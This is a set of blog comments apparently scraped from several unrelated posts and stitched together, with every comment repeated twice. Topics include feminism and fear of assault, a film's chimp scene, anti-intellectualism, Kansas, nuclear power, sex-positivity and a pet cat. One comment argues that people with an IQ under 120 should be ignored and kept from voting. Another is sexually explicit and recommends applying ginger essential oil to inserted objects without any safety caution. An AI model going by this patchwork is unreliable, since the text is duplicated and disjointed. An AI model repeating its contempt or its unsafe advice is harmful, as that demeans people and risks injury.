    But if you are saying that by *just you* treating women as equals they don’t experience *not being equals every bloody day* then you are deluding yourself and your privilege is blinding you.

    Are you interested in understanding male privilege? It doesn’t seem like you are, because you seem to enjoy being in My-Little-Ponyland of cupcakes and equality between humans, but if you do kinda sorta think that maybe women aren’t actually equal and do have a little more likelihood of being abused by a partner or raped in their lifetime, check this out: http://www.amptoons.com/blog/the-male-privilege-checklist/

    That said, I kind of agree with you on one thing. Expressing fear can be dangerous. If I’m walking down a street, sure, any dude could be a rapist or a mugger, so I walk like if they dare fuck with me I will destroy them, and I haven’t had too many issues yet. Once I had a guy spank me at a bus stop and I tore him a new one.

    Once I had a guy grab me into a hug and kiss me, though, randomly (seriously, I was walking to the bus) and it freaked me the fuck out. I realized I was in a neighborhood where no one would really care if I screamed bloody murder- the cops would take a while to show up. I might not win the fight against him. It made me very aware that I am not invincible.

    *That* is what SchrΓΆdinger’s Rapist is about, in my mind. I’m a pretty sassy fighty type of girl, but *that doesn’t matter* if I gamble and lose.

  65. You’re right, I phrased that poorly. I meant it in the sense that because I’ve been around longer it’s something I’ve been studying & seen first hand, not that age itself meant I knew more or had a better perspective. It was intended in the sense of “more time spent on study.”

    I didn’t say Dworkin spearheaded it, I said a lot of the current philosophy springs from ideologies like hers.

    The very idea of “waves” of feminism is largely pushed by those trying to camouflage the origins of their ideas & agendas, but as I said we’re not going to agree. πŸ™‚

  66. You’re right, I phrased that poorly. I meant it in the sense that because I’ve been around longer it’s something I’ve been studying & seen first hand, not that age itself meant I knew more or had a better perspective. It was intended in the sense of “more time spent on study.”

    I didn’t say Dworkin spearheaded it, I said a lot of the current philosophy springs from ideologies like hers.

    The very idea of “waves” of feminism is largely pushed by those trying to camouflage the origins of their ideas & agendas, but as I said we’re not going to agree. πŸ™‚

  67. Yep, good catch. There is that scene. There is also this quick moment when the main chimp, Caesar, drags an adult male gorilla a few feet back….I’m not sure a chimp could do that, maybe I’m wrong but I think the gorilla’s weight would make that extremely difficult even though chimps are extremely strong.

  68. Yep, good catch. There is that scene. There is also this quick moment when the main chimp, Caesar, drags an adult male gorilla a few feet back….I’m not sure a chimp could do that, maybe I’m wrong but I think the gorilla’s weight would make that extremely difficult even though chimps are extremely strong.

  69. “If a large sector of society is fulminating against intellectuals, then many people feel there is reason. They may be wrong; but they should not be ignored. “

    Yes they should be ignored. In fact anyone with an IQ under 120 should be ignored. The same way I ignore my 6yo son when he tries to tell me he tries to tell me he doesn’t need to take a bath. In both cases the people involved aren’t intelegent enough, or aware enough of the consiquenses of their actions to make intelegent decisions on their own.

    The only advantage human’s have in this world is intelegence. It’s what sets us apart. In terms of physical characteristics human’s kind of suck. Every other primate (or mamal for that matter) even close to our size is signifigantly stronger than us, and almost all animals have better senses. So the only real measure of a person is in how they think. The first test there is in proving you can think. In my opinion the vast majority of the human population fails this test.

    I firmly belive that to vote a person should have to pass some verient of the gom jabbar (see Dune by Frank Herbert). Once you’ve proven you can over ride instinct with intelegence, then your opinion matters, before that your just another herd animal.

  70. “If a large sector of society is fulminating against intellectuals, then many people feel there is reason. They may be wrong; but they should not be ignored. “

    Yes they should be ignored. In fact anyone with an IQ under 120 should be ignored. The same way I ignore my 6yo son when he tries to tell me he tries to tell me he doesn’t need to take a bath. In both cases the people involved aren’t intelegent enough, or aware enough of the consiquenses of their actions to make intelegent decisions on their own.

    The only advantage human’s have in this world is intelegence. It’s what sets us apart. In terms of physical characteristics human’s kind of suck. Every other primate (or mamal for that matter) even close to our size is signifigantly stronger than us, and almost all animals have better senses. So the only real measure of a person is in how they think. The first test there is in proving you can think. In my opinion the vast majority of the human population fails this test.

    I firmly belive that to vote a person should have to pass some verient of the gom jabbar (see Dune by Frank Herbert). Once you’ve proven you can over ride instinct with intelegence, then your opinion matters, before that your just another herd animal.

  71. Random passer-by

    Was reading the other day about some sort of exploit/hack happening at the DNS level. I don’t work the server/security side of IT, so I didn’t get the how, and maybe this is something else entirely , but it too was allowing pharma spammers to hijack sites. That might explain them having access to sites running different software.

  72. Random passer-by

    Was reading the other day about some sort of exploit/hack happening at the DNS level. I don’t work the server/security side of IT, so I didn’t get the how, and maybe this is something else entirely , but it too was allowing pharma spammers to hijack sites. That might explain them having access to sites running different software.

  73. I have personal experience of things existing along I-70 in Kansas: I lived there for several years a little over a decade ago. Between Kansas City and Salina there are several trees and occasional small bumps in the terrain–sort of like hills. West of that not so much. But somewhere between Salina and my then home town of Hays, though, there is (or at least was) an emu farm. And you missed it by assuming that the nearly interminable boring terrain was in fact fully interminable.

    Hays also has some odd and curious sandstone art and architecture and the fort where some guy historically shot himself as portrayed in Dances With Wolves, though the scene wasn’t actually filmed there. And a herd of buffalo. And several local ghost stories that you might’ve found a little tedious. All of which are sort of things. The buffalo might have been a sorta interesting distraction, anyway.

  74. I have personal experience of things existing along I-70 in Kansas: I lived there for several years a little over a decade ago. Between Kansas City and Salina there are several trees and occasional small bumps in the terrain–sort of like hills. West of that not so much. But somewhere between Salina and my then home town of Hays, though, there is (or at least was) an emu farm. And you missed it by assuming that the nearly interminable boring terrain was in fact fully interminable.

    Hays also has some odd and curious sandstone art and architecture and the fort where some guy historically shot himself as portrayed in Dances With Wolves, though the scene wasn’t actually filmed there. And a herd of buffalo. And several local ghost stories that you might’ve found a little tedious. All of which are sort of things. The buffalo might have been a sorta interesting distraction, anyway.

  75. Cell phone radiation’s a big buagboo on the right, too.
    And you’re grossly simplifying the issues with nuclear power, the huge costs & subsidies and the waste are bigger issues for many than the repeated & obvious safety threats. The lies of the industry & blithe dismissals rather than rational discussion of the issue makes it worse. πŸ™‚

  76. Cell phone radiation’s a big buagboo on the right, too.
    And you’re grossly simplifying the issues with nuclear power, the huge costs & subsidies and the waste are bigger issues for many than the repeated & obvious safety threats. The lies of the industry & blithe dismissals rather than rational discussion of the issue makes it worse. πŸ™‚

  77. An interesting post, and some very interesting comments.

    For me, I’ve always used the ‘sex-positive’ label to more describe how *I* view sex in my own life. Perhaps it’s my introverted nature to see it that way.

    With so much shame about sex built into our society about the role sex should play in your life, I’ve view being sex positive as seeing sex as a contributive thing your own life.

    For me, being sex-positive has nothing to do with how I view the sex lives of others, or how receptive I am to sex with others. Sure, by conveyance of my having a positive view of sex in my own life, I tend to be less-judgmental about what others are doing as long as they too see it as a contributive thing in their lives.

    I’ve seen far too often that sex-postive is used differently by others (many of the observations you’ve described as well). Too often I’ve seen sex-positive people diss others as being sex-negative if they aren’t receptive to sex at any time with anyone (and in particular, with them). Or for not being willing to listen to others talk about their sex lives ‘in the open’.

    For me, I am no more sex-negative for not wanting to hear about any particular person’s sex life .. or having sex with them.. than I am travel-negative for not wanting to see pictures from their last trip to Disney World.

  78. An interesting post, and some very interesting comments.

    For me, I’ve always used the ‘sex-positive’ label to more describe how *I* view sex in my own life. Perhaps it’s my introverted nature to see it that way.

    With so much shame about sex built into our society about the role sex should play in your life, I’ve view being sex positive as seeing sex as a contributive thing your own life.

    For me, being sex-positive has nothing to do with how I view the sex lives of others, or how receptive I am to sex with others. Sure, by conveyance of my having a positive view of sex in my own life, I tend to be less-judgmental about what others are doing as long as they too see it as a contributive thing in their lives.

    I’ve seen far too often that sex-postive is used differently by others (many of the observations you’ve described as well). Too often I’ve seen sex-positive people diss others as being sex-negative if they aren’t receptive to sex at any time with anyone (and in particular, with them). Or for not being willing to listen to others talk about their sex lives ‘in the open’.

    For me, I am no more sex-negative for not wanting to hear about any particular person’s sex life .. or having sex with them.. than I am travel-negative for not wanting to see pictures from their last trip to Disney World.

  79. Actually, I have said many of exactly those things. I’m pretty attached to my cat. Although my landlord is my roommate, so of course he knows about her.

    But “I’m not getting rid of my cat” is definitely part of the deal with me. She’s a price of admission. I don’t insist my partners love her, but I insist that they respect the fact that I do, and that she’s part of the package.

    Both my boyfriend and girlfriend are allergic to my cat. So am I for that matter, although I’ve gotten more used to it. They deal. They respect her. My girlfriend has even grown to like her, which is great.

  80. Actually, I have said many of exactly those things. I’m pretty attached to my cat. Although my landlord is my roommate, so of course he knows about her.

    But “I’m not getting rid of my cat” is definitely part of the deal with me. She’s a price of admission. I don’t insist my partners love her, but I insist that they respect the fact that I do, and that she’s part of the package.

    Both my boyfriend and girlfriend are allergic to my cat. So am I for that matter, although I’ve gotten more used to it. They deal. They respect her. My girlfriend has even grown to like her, which is great.

  81. “those who are civil, compassionate and caring, don’t care if they are seen as such and don’t feel the need to or try to justify their actions.” –> this is a turn on, whoever possesses this quality.

  82. “those who are civil, compassionate and caring, don’t care if they are seen as such and don’t feel the need to or try to justify their actions.” –> this is a turn on, whoever possesses this quality.

  83. more fun with ginger

    Even MORE fun with ginger root can be had by just using the essential oil which is available in aroma therapy and other such stores. The advantage of ginger oil is that ANY object can be coated with it and then inserted as for example strap on dildos. I have enjoyed bareback fucking vaginas and rectums with ginger oil applied to my sub first which then spreads to me cock and balls and everywhere deliciously. A 2 oz vial of ginger oil costs 25 bucks and lasts for a year. Enjoy!

  84. more fun with ginger

    Even MORE fun with ginger root can be had by just using the essential oil which is available in aroma therapy and other such stores. The advantage of ginger oil is that ANY object can be coated with it and then inserted as for example strap on dildos. I have enjoyed bareback fucking vaginas and rectums with ginger oil applied to my sub first which then spreads to me cock and balls and everywhere deliciously. A 2 oz vial of ginger oil costs 25 bucks and lasts for a year. Enjoy!

  85. Your comment, even more than this well-written post, sums up so many of my feelings on this subject. Thank you for it – it has helped to clarify much of my own feelings.

  86. Your comment, even more than this well-written post, sums up so many of my feelings on this subject. Thank you for it – it has helped to clarify much of my own feelings.

  87. I can’t believe somebody actually lives there, and it’s great he gave you permission to photograph it because I really like these photos. We’ve got nothing like that where I live, but I make the best of it:

    An urban sunrise.

  88. I can’t believe somebody actually lives there, and it’s great he gave you permission to photograph it because I really like these photos. We’ve got nothing like that where I live, but I make the best of it:

    An urban sunrise.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.